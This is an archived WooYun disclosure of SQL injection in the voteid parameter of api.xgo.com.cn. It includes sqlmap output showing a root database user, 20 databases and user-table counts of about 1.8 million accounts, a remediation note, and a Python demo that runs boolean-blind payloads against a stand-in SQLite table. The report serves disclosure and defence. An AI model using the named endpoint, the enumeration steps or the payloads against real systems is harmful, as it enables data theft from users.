WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --------------------------- http://drop.zone.ci/
2015-08-06: Details sent to the vendor, awaiting vendor response
2015-08-06: Vendor confirmed; details disclosed to the vendor only
2015-08-16: Details disclosed to core white hats and domain experts
2015-08-26: Details disclosed to regular white hats
2015-09-05: Details disclosed to intern white hats
2015-09-20: Details disclosed to the public
A very important host: if it falls, the consequences are severe.

Site
api.xgo.com.cn
Many of the company's other websites pull their data from this host, so a compromise here reaches well beyond the one domain.

Injection point
http://api.xgo.com.cn/vote_arrnew.php?voteid=82
The application connects to the database as root. The `voteid` parameter is a numeric value, and sqlmap confirms the back end and the DB user:

[12:52:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[12:52:43] [INFO] fetching database users
[12:52:43] [WARNING] reflective value(s) found and filtering out
[12:52:43] [INFO] the SQL query used returns 1 entries
[12:52:43] [INFO] retrieved: 'root'@'192.168.50.40'
database management system users [1]:
[*] 'root'@'192.168.50.40'
Databases
Because the connection runs as root, every database on the server is reachable through this one injection point:

available databases [20]:
[*] information_schema
[*] test
[*] xgo_active
[*] xgo_bbs
[*] xgo_bbs_admin
[*] xgo_bbs_troop
[*] xgo_comment
[*] xgo_picture
[*] xgo_plugin
[*] xgo_product
[*] xgo_product_stat
[*] xgo_review
[*] xgo_stat_hits
[*] xgo_tips
[*] xgo_tuan
[*] xgo_user
[*] xgo_yongpin
[*] xgo_zhuqu
1.8 million users
The `userinfo` table alone holds 1,869,916 rows; the `user_real`, `user_check_mobile_code` and `z_api_token` tables indicate that real-name data, phone verification codes and API tokens sit in the same database.

Database: xgo_user
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| user_relations            | 6387754 |
| userinfo                  | 1869916 |
| user_active_log           | 1677306 |
| user_checkimg             | 1476298 |
| user_album_pic            |  911875 |
| user_check_mobile_code    |  878586 |
| user_online               |  484162 |
| user_real                 |  471549 |
| user_extend               |  471537 |
| user_mail_set             |  471455 |
| user_message_2011         |  413961 |
| user_message_2014         |  394551 |
| user_register_log         |  323516 |
| user_message_2013         |  255437 |
| user_message              |  244635 |
| user_album_info           |  231716 |
| user_score                |  226902 |
| user_check_mail_code      |  221728 |
| user_oltime_2015          |  190457 |
| user_message_2012         |  156266 |
| user_oltime_2011          |  125514 |
| user_oltime_2013          |  125226 |
| userinfo_test             |  123526 |
| userinfo_new              |  111228 |
| user_visitor              |  107855 |
| user_oltime_2012          |   93920 |
| user_oltime_2014          |   88678 |
| x_invite_code             |   39950 |
| z_login_api               |   37313 |
| z_api_token               |   16951 |
| tag_from_pic              |    6339 |
| tag_from_user             |    6339 |
| user_car_list_product_rel |    5094 |
| x_user_score              |    5021 |
| x_userinfo_extend         |    5021 |
| x_log_login_2013          |    4974 |
| audit_log                 |    4824 |
| x_check_mail_code         |    4688 |
| user_comments             |    3538 |
| x_log_send_mail_2013      |    3012 |
| user_tag2                 |    2890 |
| x_register_history        |    2632 |
| user_album_pic_tags       |    2571 |
| user_carport              |    2502 |
| china_city                |    2489 |
| x_check_mobile_code       |    1926 |
| x_user_car                |    1397 |
| x_log_login_2015          |    1245 |
| user_interest_doc0        |    1232 |
| user_book_collection      |    1178 |
| x_log_login_2014          |    1101 |
| x_log_send_mail_2014      |    1080 |
| whitelistuser             |    1043 |
| x_log_modify_pwd_2013     |     989 |
| user_obj_comments         |     974 |
| tag                       |     938 |
| user_car_list             |     924 |
| user_tag_num              |     812 |
| x_register                |     758 |
| x_log_send_mail_2015      |     689 |
| checkimg_group            |     585 |
| china_town                |     580 |
| gift_present              |     425 |
| tag_user9                 |     405 |
| tag_user1                 |     388 |
| tag_user8                 |     361 |
| x_oauth_bind              |     348 |
| user_owner_info           |     346 |
| tag_user7                 |     339 |
| tag_user3                 |     320 |
| user_hide                 |     312 |
| x_log_modify_pwd_2014     |     292 |
| tag_user5                 |     287 |
| tag_user6                 |     279 |
| z_login_api_bark          |     279 |
| tag_user4                 |     244 |
| gift_buy                  |     235 |
| tag_user2                 |     232 |
| x_log_modify_pwd_2015     |     156 |
| user_interest_doc17       |     152 |
| user_car_list_vote_1      |      87 |
| tag_user10                |      70 |
| user_interest_doc18       |      39 |
| china_province            |      35 |
| user_tag1                 |      35 |
| gift                      |      32 |
| user_active_cate          |      30 |
| user_rank                 |       9 |
| gift_sort                 |       6 |
| user_modify_pw_log        |       5 |
| x_user_verify             |       2 |
| xgo_qq_session            |       2 |
+---------------------------+---------+
Proof of vulnerability
See above. A rank of 20 would not be excessive for this.

Suggested fix
Filter the input: `voteid` is an integer, so cast it to an integer (or reject anything that is not one) before it reaches the query, or use prepared statements so the value is never parsed as SQL. Separately, the application should not connect as 'root'@'192.168.50.40'; a dedicated account with only the privileges this API needs would confine a future injection to far less than all 20 databases.
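The injection point and the suggested fix side by side, as an added example that is not code from the original report or from xgo.com.cn. It uses an in-memory SQLite table constructed here as a stand-in for whatever sits behind vote_arrnew.php; the table name `vote`, its columns and its rows are assumptions. `vulnerable_lookup` shows the concatenation pattern that makes an integer parameter injectable, `hardened_lookup` shows the filter plus parameter binding, and `probe` sends the same boolean-blind requests a scanner such as sqlmap uses to confirm the bug (`AND 1=1` versus `AND 1=2`) so the difference in behaviour is visible.

```python
import re
import sqlite3

# Constructed sample data standing in for the real vote table (assumption:
# the real schema at api.xgo.com.cn is not known from the report).
SAMPLE_VOTES = [(81, "vote 81"), (82, "vote 82"), (83, "vote 83")]


def build_db():
    """Create the in-memory stand-in table and load the constructed rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE vote (voteid INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO vote VALUES (?, ?)", SAMPLE_VOTES)
    return db


def vulnerable_lookup(db, voteid):
    """Injectable pattern: the raw ?voteid= value is concatenated into the
    statement, so anything after the number is parsed as SQL."""
    sql = "SELECT voteid, title FROM vote WHERE voteid = " + voteid
    return db.execute(sql).fetchall()


def hardened_lookup(db, voteid):
    """Filtered pattern: accept only an unsigned integer at the boundary,
    then bind it as a parameter so it can never become SQL text."""
    if not re.fullmatch(r"[0-9]{1,10}", voteid):
        raise ValueError("voteid must be a positive integer")
    sql = "SELECT voteid, title FROM vote WHERE voteid = ?"
    return db.execute(sql, (int(voteid),)).fetchall()


def probe(lookup, db):
    """Send the requests used to confirm a boolean-blind injection on an
    integer parameter and return the row count for each payload, or None
    when the handler rejects the input outright."""
    results = {}
    for payload in ("82", "82 AND 1=1", "82 AND 1=2", "82 OR 1=1"):
        try:
            results[payload] = len(lookup(db, payload))
        except ValueError:
            results[payload] = None
    return results


if __name__ == "__main__":
    db = build_db()
    # vulnerable: 82 -> 1 row, AND 1=1 -> 1, AND 1=2 -> 0, OR 1=1 -> every row
    print("vulnerable:", probe(vulnerable_lookup, db))
    # hardened: 82 -> 1 row, every other payload refused before any query
    print("hardened:  ", probe(hardened_lookup, db))
```

The `AND 1=1` / `AND 1=2` pair is the signature to look for in access logs on a parameter like this: a true condition returns the normal page while a false one returns an empty result, which is exactly the differential sqlmap reports before it starts dumping users and databases.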
Severity: High
Vulnerability Rank: 15
Confirmed: 2015-08-06 16:03
Status: Fixed
Vendor reply: none